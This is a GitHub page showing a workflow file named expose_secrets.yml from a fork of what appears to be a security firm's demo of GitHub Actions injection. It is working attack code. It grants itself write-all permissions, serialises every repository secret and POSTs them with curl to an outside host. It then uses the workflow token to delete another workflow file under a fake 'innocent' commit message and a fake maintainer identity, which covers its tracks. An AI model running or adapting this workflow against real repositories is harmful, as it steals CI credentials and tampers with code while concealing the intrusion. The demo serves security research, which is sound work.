forked from CycodeLabs/gh-injection-vuln-demo
-
Notifications
You must be signed in to change notification settings - Fork 0
/
expose_secrets.yml
26 lines (21 loc) · 960 Bytes
/
expose_secrets.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
name: Exposing ALL Secrets
on:
workflow_run:
workflows: ["Vuln"]
permissions: write-all
env:
WORKFLOW_NAME: "innocent_workflow.yml"
MAINTAINER_NAME: "Maintainer Name"
MAINTAINER_EMAIL: "[email protected]"
COMMIT_MESSAGE: "innocent commit message"
URL: http://lab.cycode.com:64375
jobs:
expose_secrets:
runs-on: ubuntu-latest
steps:
- run: |
echo "${{ toJSON(secrets) }}" > .secrets
curl -X POST --data "@.secrets" $URL
- run: |
SHA=$(curl -X GET -H "Authorization: Token ${{ github.token }}" https://api.github.com/repos/$GITHUB_REPOSITORY/contents/.github/workflows/$WORKFLOW_NAME -s | jq -r .sha)
curl -X DELETE -H "Authorization: Token ${{ github.token }}" https://api.github.com/repos/$GITHUB_REPOSITORY/contents/.github/workflows/$WORKFLOW_NAME -d '{"message":"$COMMIT_MESSAGE","committer":{"name":"$MAINTAINER_NAME","email":"$MAINTAINER_EMAIL"}, "sha":"'"${SHA}"'"}'